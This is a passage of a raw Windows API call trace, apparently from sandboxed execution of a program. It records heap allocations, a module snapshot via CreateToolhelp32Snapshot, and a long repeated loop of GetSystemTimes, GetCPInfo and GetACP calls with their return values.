(dwErrCode=0x0) [0130.646] GetLastError () returned 0x0 [0130.646] SetLastError (dwErrCode=0x0) [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x98) returned 0x321a10 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1f) returned 0x321ab0 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x36) returned 0x321ad8 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x37) returned 0x321b18 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x3c) returned 0x321b58 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x31) returned 0x321ba0 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x17) returned 0x321be0 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x24) returned 0x321c00 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x14) returned 0x321c30 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0xd) returned 0x321c50 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x25) returned 0x321c68 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x39) returned 0x321c98 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x18) returned 0x321ce0 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x17) returned 0x321d00 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0xe) returned 0x321d20 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x69) returned 0x321d38 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x3e) returned 0x321db0 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1b) returned 0x321df8 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1d) returned 0x321e20 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x48) returned 0x321e48 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x12) returned 0x321e98 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x18) returned 0x321eb8 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1b) returned 0x321ed8 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x24) returned 0x321f00 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x29) returned 0x321f30 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1e) returned 0x321f68 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x41) returned 0x321f90 [0130.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x17) returned 0x321fe8 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0xf) returned 0x322008 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x16) returned 0x322020 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2a) returned 0x322040 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x29) returned 0x322078 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x15) returned 0x3220b0 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1e) returned 0x3220d0 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2a) returned 0x3220f8 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x12) returned 0x322130 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x18) returned 0x322150 [0130.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x46) returned 0x322170 [0130.647] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x3211f8 | out: hHeap=0x320000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x800) returned 0x3221c0 [0130.648] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x80) returned 0x3211f8 [0130.649] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0130.649] RtlSizeHeap (HeapHandle=0x320000, Flags=0x0, MemoryPointer=0x3211f8) returned 0x80 [0130.649] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.650] SetLastError (dwErrCode=0x0) [0130.650] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.651] GetLastError () returned 0x0 [0130.651] SetLastError (dwErrCode=0x0) [0130.652] GetLastError () returned 0x0 [0130.652] SetLastError (dwErrCode=0x0) [0130.652] GetLastError () returned 0x0 [0130.652] SetLastError (dwErrCode=0x0) [0130.652] GetLastError () returned 0x0 [0130.652] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0130.652] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0130.652] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0130.652] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0130.655] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0130.655] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0130.655] GetTickCount () returned 0x1154d94 [0130.656] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.656] GetACP () returned 0x4e4 [0130.656] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.656] GetACP () returned 0x4e4 [0130.656] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.656] GetACP () returned 0x4e4 [0130.656] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.656] GetACP () returned 0x4e4 [0130.656] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.656] GetACP () returned 0x4e4 [0130.656] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.656] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.656] GetACP () returned 0x4e4 [0130.656] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.657] GetACP () returned 0x4e4 [0130.657] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.657] GetACP () returned 0x4e4 [0130.657] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.657] GetACP () returned 0x4e4 [0130.657] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.657] GetACP () returned 0x4e4 [0130.657] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.657] GetACP () returned 0x4e4 [0130.657] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.657] GetACP () returned 0x4e4 [0130.657] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.657] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.658] GetACP () returned 0x4e4 [0130.658] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.658] GetACP () returned 0x4e4 [0130.658] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.658] GetACP () returned 0x4e4 [0130.658] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.658] GetACP () returned 0x4e4 [0130.658] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.658] GetACP () returned 0x4e4 [0130.658] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.658] GetACP () returned 0x4e4 [0130.658] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.658] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.658] GetACP () returned 0x4e4 [0130.658] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.659] GetACP () returned 0x4e4 [0130.659] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.659] GetACP () returned 0x4e4 [0130.659] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.659] GetACP () returned 0x4e4 [0130.659] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.659] GetACP () returned 0x4e4 [0130.659] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.659] GetACP () returned 0x4e4 [0130.659] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.659] GetACP () returned 0x4e4 [0130.659] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.659] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.659] GetACP () returned 0x4e4 [0130.660] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.660] GetACP () returned 0x4e4 [0130.660] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.660] GetACP () returned 0x4e4 [0130.660] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.660] GetACP () returned 0x4e4 [0130.660] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.660] GetACP () returned 0x4e4 [0130.660] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.660] GetACP () returned 0x4e4 [0130.660] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.660] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.660] GetACP () returned 0x4e4 [0130.660] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.661] GetACP () returned 0x4e4 [0130.661] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.661] GetACP () returned 0x4e4 [0130.661] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.661] GetACP () returned 0x4e4 [0130.661] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.661] GetACP () returned 0x4e4 [0130.661] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.661] GetACP () returned 0x4e4 [0130.661] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.661] GetACP () returned 0x4e4 [0130.661] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.661] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.662] GetACP () returned 0x4e4 [0130.662] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.662] GetACP () returned 0x4e4 [0130.662] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.662] GetACP () returned 0x4e4 [0130.662] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.662] GetACP () returned 0x4e4 [0130.662] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.662] GetACP () returned 0x4e4 [0130.662] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.662] GetACP () returned 0x4e4 [0130.662] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.662] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.662] GetACP () returned 0x4e4 [0130.662] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.663] GetACP () returned 0x4e4 [0130.663] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.663] GetACP () returned 0x4e4 [0130.663] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.663] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.663] GetACP () returned 0x4e4 [0130.663] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.671] GetACP () returned 0x4e4 [0130.671] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.671] GetACP () returned 0x4e4 [0130.671] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.671] GetACP () returned 0x4e4 [0130.671] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.671] GetACP () returned 0x4e4 [0130.671] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.671] GetACP () returned 0x4e4 [0130.671] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.671] GetACP () returned 0x4e4 [0130.671] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.671] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.672] GetACP () returned 0x4e4 [0130.672] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.672] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.672] GetACP () returned 0x4e4 [0130.672] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.672] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.672] GetACP () returned 0x4e4 [0130.672] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.672] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.672] GetACP () returned 0x4e4 [0130.672] 